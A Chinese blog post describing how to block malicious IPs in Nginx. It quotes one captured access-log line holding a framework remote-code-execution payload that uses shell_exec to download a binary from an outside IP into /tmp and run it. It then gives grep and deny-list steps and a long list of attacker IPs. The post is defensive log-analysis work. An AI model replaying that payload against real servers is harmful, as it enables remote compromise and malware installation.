使用 Nginx 阻止恶意 IP 访问

找到具有明显特征的访问记录，比如：

156.203.12.198 -[01/Dec/2019:17:40:34 +0800] "GET /index.php?s=/index/x09hinkx07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.132.53.119/Ouija_x.86 -O /tmp/Ouija_x.86; chmod 777 /tmp/Ouija_x.86; /tmp/Ouija_x.86 Ouija_x.86' HTTP/1.1" 400 166 "-" "Ouija_x.86/2.0" "-"

也许是某个开源框架的漏洞，执行参数上带的方法，达到下载指定文件然后执行的目的，由于危险性，所以 shell_exec 这类函数默认在 php.ini 是禁用的。

匹配特征找出不重复的 IP，写入文件：

$ cat /data/nginx_xxx/access.log | grep shell_exec | awk '{print $1}' | sort | uniq > blockips

编辑一个 nginx 配置，加入到 location 访问中：

$ cat blockips > /etc/nginx/conf.d/blockips.conf


location / {
    include /etc/nginx/conf.d/blockips.conf
    xxxx;
}

编辑 blockips.conf，行首加 "deny "，行尾加 ";"

%s/^/deny /g
%s/$/;/g

重载 nginx，这些 IP 访问就是403：

# 宿主机模式
$ nginx -s reload
# Docker模式
$ docker-compose restart nginx

附一份恶意访问IP：

deny 156.194.121.215;
deny 156.195.107.210;
deny 156.195.39.140;
deny 156.195.45.250;
deny 156.196.146.114;
deny 156.196.17.47;
deny 156.196.229.206;
deny 156.196.6.26;
deny 156.198.62.131;
deny 156.200.245.40;
deny 156.201.18.181;
deny 156.202.190.62;
deny 156.202.251.75;
deny 156.202.76.2;
deny 156.202.84.179;
deny 156.203.12.198;
deny 156.203.210.142;
deny 156.203.244.51;
deny 156.203.7.75;
deny 156.205.251.198;
deny 156.205.81.35;
deny 156.206.136.3;
deny 156.206.182.152;
deny 156.206.187.73;
deny 156.206.231.65;
deny 156.207.242.8;
deny 156.208.42.167;
deny 156.209.137.91;
deny 156.209.40.94;
deny 156.212.251.36;
deny 156.214.142.160;
deny 156.214.43.68;
deny 156.217.6.172;
deny 156.217.9.164;
deny 156.218.133.186;
deny 156.218.246.73;
deny 156.219.214.185;
deny 156.221.182.18;
deny 156.222.20.232;
deny 157.230.121.160;
deny 167.172.104.251;
deny 192.64.86.141;
deny 197.33.213.164;
deny 197.33.38.103;
deny 197.34.0.63;
deny 197.35.49.18;
deny 197.36.233.108;
deny 197.36.33.241;
deny 197.36.4.226;
deny 197.36.60.220;
deny 197.40.152.66;
deny 197.41.192.255;
deny 197.41.76.25;
deny 197.42.153.234;
deny 197.43.203.16;
deny 197.46.143.130;
deny 197.46.88.69;
deny 197.52.120.153;
deny 197.52.86.59;
deny 197.53.154.219;
deny 197.57.10.160;
deny 197.58.107.10;
deny 197.61.10.30;
deny 197.61.18.238;
deny 197.61.62.151;
deny 197.62.106.69;
deny 197.63.152.246;
deny 41.232.65.205;
deny 41.233.204.74;
deny 41.235.104.130;
deny 41.236.148.6;
deny 41.236.3.171;
deny 41.238.205.186;
deny 41.238.34.214;
deny 41.35.143.95;
deny 41.36.168.29;
deny 41.36.196.47;
deny 41.36.20.93;
deny 41.36.221.70;
deny 41.40.31.77;
deny 41.42.219.201;
deny 41.42.59.4;
deny 41.43.34.248;
deny 41.44.120.131;
deny 41.45.98.34;
deny 41.46.62.42;
deny 41.47.75.136;
deny 80.10.22.62;
deny 95.14.156.128;

deny 156.196.181.71;
deny 156.196.191.37;
deny 156.196.197.156;
deny 156.196.3.62;
deny 156.197.229.125;
deny 156.201.133.105;
deny 156.201.98.17;
deny 156.202.112.54;
deny 156.202.152.246;
deny 156.202.31.234;
deny 156.202.39.255;
deny 156.203.54.61;
deny 156.203.96.174;
deny 156.204.165.223;
deny 156.205.169.68;
deny 156.206.214.19;
deny 156.208.49.5;
deny 156.208.51.140;
deny 156.209.187.210;
deny 156.209.35.200;
deny 156.212.44.77;
deny 156.213.35.145;
deny 156.216.156.144;
deny 156.218.136.219;
deny 156.219.45.190;
deny 156.220.186.189;
deny 156.221.230.75;
deny 156.221.8.69;
deny 182.64.156.46;
deny 197.33.205.142;
deny 197.33.214.152;
deny 197.33.99.150;
deny 197.34.177.145;
deny 197.35.113.116;
deny 197.35.85.109;
deny 197.36.186.126;
deny 197.36.19.18;
deny 197.37.180.73;
deny 197.38.244.62;
deny 197.40.184.150;
deny 197.40.238.169;
deny 197.41.112.15;
deny 197.41.178.87;
deny 197.41.86.1;
deny 197.43.220.39;
deny 197.45.9.234;
deny 197.46.71.54;
deny 197.47.108.224;
deny 197.47.221.54;
deny 197.52.165.67;
deny 197.54.42.198;
deny 197.56.28.28;
deny 197.56.59.108;
deny 197.57.167.86;
deny 197.57.219.86;
deny 197.59.221.148;
deny 197.61.186.6;
deny 197.61.85.58;
deny 197.62.227.36;
deny 197.63.13.29;
deny 197.63.205.232;
deny 41.232.17.135;
deny 41.232.27.153;
deny 41.234.133.17;
deny 41.235.102.192;
deny 41.235.244.63;
deny 41.236.223.4;
deny 41.236.56.8;
deny 41.237.33.100;
deny 41.239.135.65;
deny 41.239.77.234;
deny 41.42.35.168;
deny 41.42.59.130;
deny 41.45.30.236;
deny 41.46.236.128;
deny 41.46.255.174;

deny 141.98.80.117;
deny 141.98.80.42;
deny 185.153.196.48;
deny 185.153.198.163;
deny 185.153.199.3;
deny 185.156.177.10;
deny 193.106.31.202;
deny 193.188.22.123;
deny 193.188.22.187;
deny 193.188.22.234;
deny 193.188.22.76;
deny 193.188.23.25;
deny 39.107.142.5;
deny 41.216.186.89;
deny 45.141.86.144;
deny 46.161.27.112;

Link：https://www.cnblogs.com/farwish/p/12080630.html